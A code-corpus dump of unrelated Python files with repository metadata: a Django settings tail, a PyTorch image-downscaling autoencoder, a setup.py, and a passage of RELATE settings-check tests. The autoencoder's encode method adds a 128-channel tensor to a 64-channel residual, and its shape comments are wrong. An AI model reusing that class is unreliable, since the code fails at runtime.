'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'background_task',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'django_amazon.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'django_amazon.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
CRISPY_TEMPLATE_PACK ='bootstrap4'
MEDIA_ROOT=os.path.join(BASE_DIR,'media')
MEDIA_URL='/media/'
LOGIN_REDIRECT_URL='tracker-home'
LOGIN_URL='login'
EMAIL_HOST='smtp.gmail.com'
EMAIL_PORT = 587
EMAIL_USE_TLS = True
EMAIL_HOST_USER = os.environ.get('EMAIL_USER2')
EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_PASS2') | 25.257143 | 91 | 0.704751 |
acfa8ec0491ee9a27e9a6e7f49bd4dcf85f074c8 | 4,095 | py | Python | src/tar/models/conv_only_very_large2.py | SeleSchaefer/super_resolution | bf28a959fb150ceeadbd9f0bcfc12f3025cf82f4 | [
"MIT"
] | 5 | 2019-11-11T10:01:52.000Z | 2020-12-08T11:56:33.000Z | src/tar/models/conv_only_very_large2.py | SeleSchaefer/super_resolution | bf28a959fb150ceeadbd9f0bcfc12f3025cf82f4 | [
"MIT"
] | 1 | 2020-06-13T06:39:44.000Z | 2020-06-13T06:39:44.000Z | src/tar/models/conv_only_very_large2.py | SeleSchaefer/super_resolution | bf28a959fb150ceeadbd9f0bcfc12f3025cf82f4 | [
"MIT"
] | 1 | 2020-07-16T23:07:28.000Z | 2020-07-16T23:07:28.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# =============================================================================
# Created By : Simon Schaefer
# Description : Task aware image downscaling autoencoder model - SCALING.
# Convolutional layers only (no resblocks).
# =============================================================================
import torch
from torch import nn
from tar.modules import _Resblock_, _ReversePixelShuffle_
def build_net():
return CONV_ONLY_VERY_LARGE2()
class CONV_ONLY_VERY_LARGE2(nn.Module):
def __init__(self):
super(CONV_ONLY_VERY_LARGE2, self).__init__()
# Build encoding part.
self._downscaling = nn.Sequential(
nn.Conv2d(3, 8, 3, stride=1, padding=1),
nn.Conv2d(8, 16, 3, stride=1, padding=1),
_ReversePixelShuffle_(downscale_factor=2),
)
self._conv_en1 = nn.Conv2d(64, 64, 3, stride=1, padding=1)
self._conv_en2 = nn.Conv2d(64, 64, 3, stride=1, padding=1)
self._conv_en3 = nn.Conv2d(64, 64, 3, stride=1, padding=1)
self._conv_en4 = nn.Conv2d(64, 128, 3, stride=1, padding=1)
self._conv_en5 = nn.Conv2d(128, 256, 3, stride=1, padding=1)
self._conv_en6 = nn.Conv2d(256, 128, 3, stride=1, padding=1)
self._conv_en7 = nn.Conv2d(64, 3, 3, stride=1, padding=1)
# Build decoding part.
self._conv_de1 = nn.Conv2d(3, 64, 3, stride=1, padding=1)
self._conv_de2 = nn.Conv2d(64, 64, 3, stride=1, padding=1)
self._conv_de3 = nn.Conv2d(64, 64, 3, stride=1, padding=1)
self._conv_de4 = nn.Conv2d(64, 128, 3, stride=1, padding=1)
self._conv_de5 = nn.Conv2d(128, 256, 3, stride=1, padding=1)
self._conv_de6 = nn.Conv2d(256, 128, 3, stride=1, padding=1)
self._conv_de7 = nn.Conv2d(128, 64, 3, stride=1, padding=1)
self._upscaling = nn.Sequential(
nn.Conv2d(64, 256, 3, stride=1, padding=1),
nn.PixelShuffle(upscale_factor=2),
nn.Conv2d(64, 3, 3, stride=1, padding=1)
)
def encode(self, x: torch.Tensor) -> torch.Tensor: # b, 3, p, p
x = self._downscaling(x) # b, 64, p/2, p/2
residual = x
x = self._conv_en1(x) # b, 64, p/2, p/2
x = self._conv_en2(x) # b, 64, p/2, p/2
x = torch.add(residual, x) # b, 64, p/2, p/2
x = self._conv_en3(x) # b, 64, p/2, p/2
x = self._conv_en4(x) # b, 64, p/2, p/2
x = self._conv_en5(x) # b, 64, p/2, p/2
x = self._conv_en6(x) # b, 64, p/2, p/2
x = torch.add(residual, x) # b, 64, p/2, p/2
x = self._conv_en7(x) # b, 3, p/2, p/2
return x
def decode(self, x: torch.Tensor) -> torch.Tensor:
x = self._conv_de1(x) # b, 64, p/2, p/2
residual = x
x = self._conv_de2(x) # b, 64, p/2, p/2
x = self._conv_de3(x) # b, 64, p/2, p/2
x = torch.add(residual, x) # b, 64, p/2, p/2
x = self._conv_de4(x) # b, 64, p/2, p/2
x = self._conv_de5(x) # b, 64, p/2, p/2
x = self._conv_de6(x) # b, 64, p/2, p/2
x = self._conv_de7(x) # b, 64, p/2, p/2
x = torch.add(residual, x) # b, 64, p/2, p/2
x = self._upscaling(x) # b, 3, p, p
return x
def forward(self, x: torch.Tensor) -> torch.Tensor:
return self.decode(self.encode(x))
| 53.181818 | 85 | 0.443712 |
acfa904b117b159eecfead4a89ff9eef99d6d35e | 1,319 | py | Python | setup.py | ligonier/django-sitemap-extras | 1260b20a6ac86e1d6b026599bec318ec1141612f | [
"BSD-3-Clause"
] | null | null | null | setup.py | ligonier/django-sitemap-extras | 1260b20a6ac86e1d6b026599bec318ec1141612f | [
"BSD-3-Clause"
] | null | null | null | setup.py | ligonier/django-sitemap-extras | 1260b20a6ac86e1d6b026599bec318ec1141612f | [
"BSD-3-Clause"
] | null | null | null | import os
from distutils.core import setup
def read_file(filename):
"""Read a file into a string"""
path = os.path.abspath(os.path.dirname(__file__))
filepath = os.path.join(path, filename)
try:
return open(filepath).read()
except IOError:
return ''
setup(name='django-sitemap-extras',
version="1.0",
description='A rethink of django.contrib.sitemaps that focuses on better performance, more flexibliity and support for a larger variety of formats.',
long_description=read_file('README.rst'),
author='Justin Quick',
author_email='justquick@gmail.com',
url='http://github.com/justquick/django-sitemap-extras',
packages=['sitemapext', 'sitemapext.runtests', 'sitemapext.builder'],
install_requires=read_file('requirements.txt'),
zip_safe=False,
classifiers=['Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Database'],
)
| 38.794118 | 155 | 0.608795 |
acfa90ece9f76db29da74df66df6e62218b3b1cf | 44,827 | py | Python | tests/test_checks.py | hanjianwei/relate | 971e27a1bdd69236dc6dc294024b50584435a18d | [
"Unlicense"
] | null | null | null | tests/test_checks.py | hanjianwei/relate | 971e27a1bdd69236dc6dc294024b50584435a18d | [
"Unlicense"
] | 6 | 2015-08-18T00:13:40.000Z | 2018-01-31T05:55:13.000Z | tests/test_checks.py | dzhuang/relate | f90cc146861e1523f50d29fa1e90ded32e351428 | [
"Unlicense"
] | null | null | null | __copyright__ = "Copyright (C) 2017 Dong Zhuang"
__license__ = """
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import os
from datetime import datetime
from django.core.exceptions import ImproperlyConfigured
from django.test import SimpleTestCase
from django.test.utils import override_settings
from django.utils.translation import gettext_lazy as _
from django.conf import settings
from relate.checks import register_startup_checks_extra
from tests.utils import mock
from tests.factories import UserFactory
class CheckRelateSettingsBase(SimpleTestCase):
@property
def func(self):
from relate.checks import check_relate_settings
return check_relate_settings
@property
def msg_id_prefix(self):
raise NotImplementedError()
def assertCheckMessages(self, # noqa
expected_ids=None, expected_msgs=None, length=None,
filter_message_id_prefixes=None, ignore_order=False):
"""
Check the run check result of the setting item of the testcase instance
:param expected_ids: Optional, list of expected message id,
default to None
:param expected_msgs: Optional, list of expected message string,
default to None
:param length: Optional, length of expected check message,
default to None
:param filter_message_id_prefixes: a list or tuple of message id prefix,
to restrict the
run check result to be within the iterable.
"""
if not filter_message_id_prefixes:
filter_message_id_prefixes = self.msg_id_prefix
if isinstance(filter_message_id_prefixes, str):
filter_message_id_prefixes = [filter_message_id_prefixes]
assert isinstance(filter_message_id_prefixes, (list, tuple))
if expected_ids is None and expected_msgs is None and length is None:
raise RuntimeError("At least one parameter should be specified "
"to make the assertion")
result = self.func(None)
def is_id_in_filter(id, filter):
prefix = id.split(".")[0]
return prefix in filter
try:
result_ids, result_msgs = (
list(zip(*[(r.id, r.msg) for r in result
if is_id_in_filter(r.id, filter_message_id_prefixes)])))
if expected_ids is not None:
assert isinstance(expected_ids, (list, tuple))
if ignore_order:
result_ids = tuple(sorted(list(result_ids)))
expected_ids = sorted(list(expected_ids))
self.assertEqual(result_ids, tuple(expected_ids))
if expected_msgs is not None:
assert isinstance(expected_msgs, (list, tuple))
if ignore_order:
result_msgs = tuple(sorted(list(result_msgs)))
expected_msgs = sorted(list(expected_msgs))
self.assertEqual(result_msgs, tuple(expected_msgs))
if length is not None:
self.assertEqual(len(expected_ids), len(result_ids))
except ValueError as e:
if "values to unpack" in str(e):
if expected_ids or expected_msgs or length:
self.fail("Check message unexpectedly found to be empty")
else:
raise
class CheckRelateURL(CheckRelateSettingsBase):
msg_id_prefix = "relate_base_url"
VALID_CONF = "example.com"
INVALID_CONF_NONE = None
INVALID_CONF_EMPTY_LIST = []
INVALID_CONF_SPACES = " "
@override_settings(RELATE_BASE_URL=VALID_CONF)
def test_valid_relate_base_url1(self):
self.assertCheckMessages([])
@override_settings(RELATE_BASE_URL=INVALID_CONF_NONE)
def test_invalid_relate_base_url_none(self):
self.assertCheckMessages(["relate_base_url.E001"])
@override_settings(RELATE_BASE_URL=INVALID_CONF_EMPTY_LIST)
def test_invalid_relate_base_url_empty_list(self):
self.assertCheckMessages(["relate_base_url.E002"])
@override_settings(RELATE_BASE_URL=INVALID_CONF_SPACES)
def test_invalid_relate_base_url_spaces(self):
self.assertCheckMessages(["relate_base_url.E003"])
class CheckRelateUserProfileMaskMethod(CheckRelateSettingsBase):
# This TestCase is not pure for check, but also make sure it returned
# expected result
databases = '__all__'
msg_id_prefix = "relate_user_profile_mask_method"
def setUp(self):
super(CheckRelateUserProfileMaskMethod, self).setUp()
self.user = UserFactory.create(first_name="my_first", last_name="my_last")
from accounts.utils import relate_user_method_settings
relate_user_method_settings.__dict__ = {}
def test_get_masked_profile_not_configured(self):
with override_settings():
del settings.RELATE_USER_PROFILE_MASK_METHOD
self.assertCheckMessages([])
# make sure it runs without issue
self.assertIsNotNone(self.user.get_masked_profile())
def test_get_masked_profile_valid_none(self):
with override_settings(RELATE_USER_PROFILE_MASK_METHOD=None):
self.assertCheckMessages([])
# make sure it runs without issue
self.assertIsNotNone(self.user.get_masked_profile())
def test_get_masked_profile_valid_method1(self):
def custom_method(u):
return "%s%s" % ("User", str(u.pk + 1))
with override_settings(RELATE_USER_PROFILE_MASK_METHOD=custom_method):
self.assertCheckMessages([])
self.assertEqual(self.user.get_masked_profile(),
custom_method(self.user))
def test_get_masked_profile_valid_method2(self):
def custom_method(user=None):
if user is not None:
return "%s%s" % ("User", str(user.pk + 1))
else:
return ""
with override_settings(RELATE_USER_PROFILE_MASK_METHOD=custom_method):
self.assertCheckMessages([])
self.assertEqual(self.user.get_masked_profile(),
custom_method(self.user))
def test_get_masked_profile_valid_method_path(self):
with override_settings(
RELATE_USER_PROFILE_MASK_METHOD=(
"tests.resource"
".my_custom_get_masked_profile_method_valid")):
self.assertCheckMessages([])
from tests.resource import (
my_custom_get_masked_profile_method_valid as custom_method)
self.assertEqual(self.user.get_masked_profile(),
custom_method(self.user))
def test_get_masked_profile_param_invalid1(self):
# the method has 0 args/kwargs
def custom_method():
return "profile"
with override_settings(RELATE_USER_PROFILE_MASK_METHOD=custom_method):
self.assertCheckMessages(['relate_user_profile_mask_method.E003'])
def test_get_masked_profile_param_invalid2(self):
# the method has 2 args/kwargs
def custom_method(u, v):
return "%s%s" % ("User", str(u.pk + 1))
with override_settings(RELATE_USER_PROFILE_MASK_METHOD=custom_method):
self.assertCheckMessages(['relate_user_profile_mask_method.E003'])
def test_get_masked_profile_param_invalid3(self):
# the method has 2 args/kwargs
def custom_method(u, v=None):
return "%s%s" % ("User", str(u.pk + 1))
with override_settings(RELATE_USER_PROFILE_MASK_METHOD=custom_method):
self.assertCheckMessages(['relate_user_profile_mask_method.E003'])
def test_get_masked_profile_invalid_path(self):
with override_settings(RELATE_USER_PROFILE_MASK_METHOD="invalid path"):
self.assertCheckMessages(['relate_user_profile_mask_method.E001'])
def test_get_masked_profile_valid_path_not_callable(self):
with override_settings(
RELATE_USER_PROFILE_MASK_METHOD=(
"tests.resource"
".my_custom_get_masked_profile_method_invalid_str")):
self.assertCheckMessages(['relate_user_profile_mask_method.E002'])
def test_passed_check_but_return_none(self):
with override_settings(
RELATE_USER_PROFILE_MASK_METHOD=(
"tests.resource"
".my_custom_get_masked_profile_method_valid_but_return_none")): # noqa
self.assertCheckMessages([])
from tests.resource import (
my_custom_get_masked_profile_method_valid_but_return_none
as custom_method)
# test method can run
custom_method(self.user)
with self.assertRaises(RuntimeError):
self.user.get_masked_profile()
def test_passed_check_but_return_empty_string(self):
with override_settings(
RELATE_USER_PROFILE_MASK_METHOD=(
"tests.resource"
".my_custom_get_masked_profile_method_valid_but_return_emtpy_string")): # noqa
self.assertCheckMessages([])
from tests.resource import (
my_custom_get_masked_profile_method_valid_but_return_emtpy_string
as custom_method)
# test method can run
custom_method(self.user)
with self.assertRaises(RuntimeError):
self.user.get_masked_profile()
class CheckRelateUserFullNameFormatMethod(CheckRelateSettingsBase):
# This TestCase is not pure for check, but also make sure it returned
# expected result
databases = '__all__'
msg_id_prefix = "relate_user_full_name_format_method"
def test_get_full_name(self):
def valid_method(first_name, last_name):
return "%s %s" % (last_name, first_name)
def invalid_method1(first_name):
return first_name
def invalid_method2(first_name, last_name):
return None
def invalid_method3(first_name, last_name):
return " "
def invalid_method4(first_name, last_name):
return b"my_name"
def invalid_method5(first_name, last_name):
return "my_name"
def invalid_method6(first_name, last_name):
return Exception()
default_user_dict = {"first_name": "first_name", "last_name": "last_name"}
default_result = "first_name last_name"
user_get_full_name_test_kwargs_list = (
({"id": 1,
"custom_method": None,
"user_dict": {},
"default": '',
"not_allow_blank": None,
"force_verbose_blank": "(blank) (blank)"}),
({"id": 2,
"custom_method": None,
"user_dict": default_user_dict,
"default": default_result,
"not_allow_blank": default_result,
"force_verbose_blank": default_result}),
({"id": 3,
"custom_method": valid_method,
"user_dict": default_user_dict,
"default": "last_name first_name",
"not_allow_blank": "last_name first_name",
"force_verbose_blank": "last_name first_name"}),
({"id": 4,
"custom_method": invalid_method1,
"user_dict": default_user_dict,
"default": default_result,
"not_allow_blank": default_result,
"force_verbose_blank": default_result,
"check_messages": ['relate_user_full_name_format_method.W003']}),
({"id": 5,
"custom_method": invalid_method2,
"user_dict": default_user_dict,
"default": default_result,
"not_allow_blank": default_result,
"force_verbose_blank": default_result,
"check_messages": ['relate_user_full_name_format_method.W004']}),
({"id": 6,
"custom_method": invalid_method3,
"user_dict": default_user_dict,
"default": default_result,
"not_allow_blank": default_result,
"force_verbose_blank": default_result,
"check_messages": ['relate_user_full_name_format_method.W004']}),
({"id": 7,
"custom_method": invalid_method4,
"user_dict": default_user_dict,
"default": default_result,
"not_allow_blank": default_result,
"force_verbose_blank": default_result,
"check_messages": ['relate_user_full_name_format_method.W004']}),
({"id": 8,
"custom_method": invalid_method5,
"user_dict": default_user_dict,
"default": default_result,
"not_allow_blank": default_result,
"force_verbose_blank": default_result,
"check_messages": ['relate_user_full_name_format_method.W005']}),
({"id": 9,
"custom_method": invalid_method6,
"user_dict": default_user_dict,
"default": default_result,
"not_allow_blank": default_result,
"force_verbose_blank": default_result,
"check_messages": ['relate_user_full_name_format_method.W004']}),
({"id": 10,
"custom_method": "abcd", # a string
"user_dict": default_user_dict,
"default": default_result,
"not_allow_blank": default_result,
"force_verbose_blank": default_result,
"check_messages": ['relate_user_full_name_format_method.W001']}),
({"id": 11,
"custom_method":
"tests.resource.my_customized_get_full_name_method",
"user_dict": default_user_dict,
"default": "First_Name Last_Name",
"not_allow_blank": "First_Name Last_Name",
"force_verbose_blank": "First_Name Last_Name"}),
({"id": 12,
"custom_method":
"tests.resource.my_customized_get_full_name_method_invalid",
"user_dict": default_user_dict,
"default": default_result,
"not_allow_blank": default_result,
"force_verbose_blank": default_result,
"check_messages": ['relate_user_full_name_format_method.W004']}),
({"id": 13,
"custom_method":
"tests.resource.my_customized_get_full_name_method_invalid_str",
"user_dict": default_user_dict,
"default": default_result,
"not_allow_blank": default_result,
"force_verbose_blank": default_result,
"check_messages": ['relate_user_full_name_format_method.W002']}),
({"id": 14,
"custom_method":
"tests.resource.my_customized_get_full_name_method",
"user_dict": {"first_name": "first_name"},
"default": "First_Name",
"not_allow_blank": None,
"force_verbose_blank": "First_Name (Blank)"}),
)
# Ensure no duplicate entries in user_get_full_name_test_kwargs_list
# to generate error info when subTests fail.
ids = set([kwargs["id"] for kwargs in user_get_full_name_test_kwargs_list])
assert len(ids) == len(user_get_full_name_test_kwargs_list)
for kwargs in user_get_full_name_test_kwargs_list:
# clear cached_property
from accounts.utils import relate_user_method_settings
relate_user_method_settings.__dict__ = {}
with self.subTest(id=kwargs["id"]):
with override_settings(
RELATE_USER_FULL_NAME_FORMAT_METHOD=kwargs[
"custom_method"]):
check_messages = kwargs.get("check_messages", [])
self.assertCheckMessages(check_messages)
user = UserFactory(**kwargs["user_dict"])
self.assertEqual(user.get_full_name(), kwargs["default"])
self.assertEqual(user.get_full_name(allow_blank=False),
kwargs["not_allow_blank"])
self.assertEqual(user.get_full_name(force_verbose_blank=True),
kwargs["force_verbose_blank"])
class CheckRelateEmailAppellationPriorityList(CheckRelateSettingsBase):
msg_id_prefix = "relate_email_appellation_priority_list"
VALID_CONF_NONE = None
VALID_CONF = ["full_name"]
INVALID_CONF_STR = "name1"
INVALID_CONF = ["name1", "name2"]
@override_settings(RELATE_EMAIL_APPELLATION_PRIORITY_LIST=VALID_CONF_NONE)
def test_relate_email_appellation_priority_list_none(self):
self.assertCheckMessages([])
@override_settings(RELATE_EMAIL_APPELLATION_PRIORITY_LIST=VALID_CONF)
def test_relate_email_appellation_priority_list_valid(self):
self.assertCheckMessages([])
@override_settings(RELATE_EMAIL_APPELLATION_PRIORITY_LIST=INVALID_CONF_STR)
def test_relate_email_appellation_priority_list_invalid_str(self):
self.assertCheckMessages(
["relate_email_appellation_priority_list.W001"])
@override_settings(RELATE_EMAIL_APPELLATION_PRIORITY_LIST=INVALID_CONF)
def test_relate_email_appellation_priority_list_invalid(self):
self.assertCheckMessages(["relate_email_appellation_priority_list.W002"])
@override_settings(RELATE_EMAIL_APPELLATION_PRIORITY_LIST=None,
RELATE_EMAIL_APPELATION_PRIORITY_LIST=VALID_CONF)
def test_relate_email_appellation_priority_list_type_deprecated(self):
self.assertCheckMessages(["relate_email_appellation_priority_list.W003"])
@override_settings(RELATE_EMAIL_APPELATION_PRIORITY_LIST=None,
RELATE_EMAIL_APPELLATION_PRIORITY_LIST=None)
def test_relate_email_appellation_priority_list_type_deprecated_none(self):
self.assertCheckMessages([])
class CheckRelateEmailConnections(CheckRelateSettingsBase):
msg_id_prefix = "email_connections"
VALID_CONF_NONE = None
VALID_CONF_EMPTY_DICT = {}
VALID_CONF = {
"robot": {
'backend': 'django.core.mail.backends.console.EmailBackend',
'host': 'smtp.gmail.com',
'username': 'blah@blah.com',
'password': 'password',
'port': 587,
'use_tls': True,
},
"other": {}
}
INVALID_CONF_EMPTY_LIST = []
INVALID_CONF_LIST = [VALID_CONF]
INVALID_CONF_LIST_AS_ITEM_VALUE = {
"robot": ['blah@blah.com'],
"other": [],
"yet_another": {}
}
INVALID_CONF_INVALID_BACKEND = {
"robot": {
'backend': 'an.invalid.emailBackend', # invalid backend
'host': 'smtp.gmail.com',
'username': 'blah@blah.com',
'password': 'password',
'port': 587,
'use_tls': True,
},
"other": {}
}
@override_settings(EMAIL_CONNECTIONS=VALID_CONF_NONE)
def test_valid_email_connections_none(self):
self.assertCheckMessages([])
@override_settings(EMAIL_CONNECTIONS=VALID_CONF_EMPTY_DICT)
def test_valid_email_connections_emtpy_dict(self):
self.assertCheckMessages([])
@override_settings(EMAIL_CONNECTIONS=VALID_CONF)
def test_valid_email_connections(self):
self.assertCheckMessages([])
@override_settings(EMAIL_CONNECTIONS=INVALID_CONF_EMPTY_LIST)
def test_invalid_email_connections_empty_list(self):
self.assertCheckMessages(["email_connections.E001"])
@override_settings(EMAIL_CONNECTIONS=INVALID_CONF_LIST)
def test_invalid_email_connections_list(self):
self.assertCheckMessages(["email_connections.E001"])
@override_settings(EMAIL_CONNECTIONS=INVALID_CONF_LIST_AS_ITEM_VALUE)
def test_invalid_email_connections_list_as_item_value(self):
self.assertCheckMessages(
["email_connections.E002", "email_connections.E002"])
@override_settings(EMAIL_CONNECTIONS=INVALID_CONF_INVALID_BACKEND)
def test_invalid_email_connections_invalid_backend(self):
self.assertCheckMessages(["email_connections.E003"])
class CheckRelateFacilities(CheckRelateSettingsBase):
msg_id_prefix = "relate_facilities"
VALID_CONF_NONE = None
VALID_CONF = (
{
"test_center": {
"ip_ranges": ["192.168.192.0/24"],
"exams_only": False},
"test_center2": {
"ip_ranges": ["192.168.10.0/24"]},
})
INVALID_CONF_LIST = []
INVALID_CONF_NOT_DICT_AS_ITEM_VALUE = (
{
"test_center": {
"ip_ranges": ["192.168.192.0/24"],
"exams_only": False},
"test_center2": [], # not a dict
"test_center3": ("192.168.10.0/24"), # not a dict
})
INVALID_CONF_IP_RANGES_NOT_LIST = (
{
"test_center": {
"ip_ranges": "192.168.192.0/24", # not a list
"exams_only": False},
"test_center2": [],
})
INVALID_CONF_IP_RANGES_ITEM_NOT_IPADDRESS = (
{
"test_center": {
"ip_ranges": ["www.example.com", "localhost"] # invalid ipadd
},
})
WARNING_CONF_IP_RANGES_NOT_CONFIGURED = (
{
"test_center": {"exams_only": False},
"test_center2": {},
})
@override_settings(RELATE_FACILITIES=VALID_CONF_NONE)
def test_valid_relate_facilities_none(self):
self.assertCheckMessages([])
@override_settings(RELATE_FACILITIES=VALID_CONF)
def test_valid_relate_facilities(self):
self.assertCheckMessages([])
def test_valid_relate_facilities_callable(self):
def valid_func(now_datetime):
from django.utils.timezone import now
if now_datetime > now():
return self.VALID_CONF
else:
return {}
with override_settings(RELATE_FACILITIES=valid_func):
self.assertCheckMessages([])
def test_valid_relate_facilities_callable_with_empty_ip_ranges(self):
def valid_func_though_return_emtpy_ip_ranges(now_datetime):
# this won't result in warnning, because the facility is defined
# by a callable.
return self.WARNING_CONF_IP_RANGES_NOT_CONFIGURED
with override_settings(
RELATE_FACILITIES=valid_func_though_return_emtpy_ip_ranges):
self.assertCheckMessages([])
@override_settings(RELATE_FACILITIES=INVALID_CONF_LIST)
def test_invalid_relate_facilities_callable_return_list(self):
self.assertCheckMessages(["relate_facilities.E002"])
@override_settings(RELATE_FACILITIES=INVALID_CONF_NOT_DICT_AS_ITEM_VALUE)
def test_invalid_relate_facilities_callable_not_dict_as_item_value(self):
self.assertCheckMessages(
["relate_facilities.E003", "relate_facilities.E003"])
@override_settings(RELATE_FACILITIES=INVALID_CONF_IP_RANGES_NOT_LIST)
def test_invalid_relate_facilities_ip_ranges_not_list(self):
self.assertCheckMessages(
["relate_facilities.E003", "relate_facilities.E004"],
ignore_order=True)
@override_settings(RELATE_FACILITIES=INVALID_CONF_IP_RANGES_ITEM_NOT_IPADDRESS)
def test_invalid_relate_facilities_ip_ranges_item_not_ipaddress(self):
self.assertCheckMessages(
["relate_facilities.E005", "relate_facilities.E005"],
ignore_order=True)
def test_invalid_relate_facilities_callable_not_return_dict(self):
def invalid_func_not_return_dict(now_datetime):
return self.INVALID_CONF_LIST
with override_settings(RELATE_FACILITIES=invalid_func_not_return_dict):
self.assertCheckMessages(["relate_facilities.E001"])
def test_invalid_relate_facilities_callable_return_invalid_conf(self):
def invalid_func_return_invalid_conf(now_datetime):
return self.INVALID_CONF_NOT_DICT_AS_ITEM_VALUE
with override_settings(RELATE_FACILITIES=invalid_func_return_invalid_conf):
self.assertCheckMessages(
["relate_facilities.E003", "relate_facilities.E003"])
def test_invalid_relate_facilities_callable_return_none(self):
def invalid_func_return_none(now_datetime):
return None
with override_settings(RELATE_FACILITIES=invalid_func_return_none):
self.assertCheckMessages(["relate_facilities.E001"])
@override_settings(RELATE_FACILITIES=WARNING_CONF_IP_RANGES_NOT_CONFIGURED)
def test_warning_relate_facilities(self):
self.assertCheckMessages(
["relate_facilities.W001", "relate_facilities.W001"])
class CheckRelateMaintenanceModeExceptions(CheckRelateSettingsBase):
msg_id_prefix = "relate_maintenance_mode_exceptions"
VALID_CONF_NONE = None
VALID_CONF_EMPTY_LIST = []
VALID_CONF = ["127.0.0.1", "192.168.1.1"]
INVALID_CONF_STR = "127.0.0.1"
INVALID_CONF_DICT = {"localhost": "127.0.0.1",
"www.myrelate.com": "192.168.1.1"}
INVALID_CONF_INVALID_IPS = ["localhost", "www.myrelate.com"]
@override_settings(RELATE_MAINTENANCE_MODE_EXCEPTIONS=VALID_CONF_NONE)
def test_valid_maintenance_mode_exceptions_none(self):
self.assertCheckMessages([])
@override_settings(RELATE_MAINTENANCE_MODE_EXCEPTIONS=VALID_CONF_EMPTY_LIST)
def test_valid_maintenance_mode_exceptions_emtpy_list(self):
self.assertCheckMessages([])
@override_settings(RELATE_MAINTENANCE_MODE_EXCEPTIONS=VALID_CONF)
def test_valid_maintenance_mode_exceptions(self):
self.assertCheckMessages([])
@override_settings(RELATE_MAINTENANCE_MODE_EXCEPTIONS=INVALID_CONF_STR)
def test_invalid_maintenance_mode_exceptions_str(self):
self.assertCheckMessages(["relate_maintenance_mode_exceptions.E001"])
@override_settings(RELATE_MAINTENANCE_MODE_EXCEPTIONS=INVALID_CONF_DICT)
def test_invalid_maintenance_mode_exceptions_dict(self):
self.assertCheckMessages(["relate_maintenance_mode_exceptions.E001"])
@override_settings(RELATE_MAINTENANCE_MODE_EXCEPTIONS=INVALID_CONF_INVALID_IPS)
def test_invalid_maintenance_mode_exceptions_invalid_ipaddress(self):
self.assertCheckMessages(["relate_maintenance_mode_exceptions.E002",
"relate_maintenance_mode_exceptions.E002"])
class CheckRelateSessionRestartCooldownSeconds(CheckRelateSettingsBase):
msg_id_prefix = "relate_session_restart_cooldown_seconds"
VALID_CONF = 10
VALID_CONF_BY_CALC = 2 * 5
INVALID_CONF_STR = "10"
INVALID_CONF_LIST = [10]
INVALID_CONF_NEGATIVE = -10
@override_settings()
def test_valid_relate_session_restart_cooldown_seconds_not_configured(self):
del settings.RELATE_SESSION_RESTART_COOLDOWN_SECONDS
self.assertCheckMessages([])
@override_settings(RELATE_SESSION_RESTART_COOLDOWN_SECONDS=None)
def test_valid_relate_session_restart_cooldown_seconds_none(self):
self.assertCheckMessages([])
@override_settings(RELATE_SESSION_RESTART_COOLDOWN_SECONDS=VALID_CONF)
def test_valid_relate_session_restart_cooldown_seconds(self):
self.assertCheckMessages([])
@override_settings(RELATE_SESSION_RESTART_COOLDOWN_SECONDS=VALID_CONF_BY_CALC)
def test_valid_relate_session_restart_cooldown_seconds_by_calc(self):
self.assertCheckMessages([])
@override_settings(RELATE_SESSION_RESTART_COOLDOWN_SECONDS=INVALID_CONF_STR)
def test_invalid_maintenance_mode_exceptions_str(self):
self.assertCheckMessages(
["relate_session_restart_cooldown_seconds.E001"])
@override_settings(RELATE_SESSION_RESTART_COOLDOWN_SECONDS=INVALID_CONF_LIST)
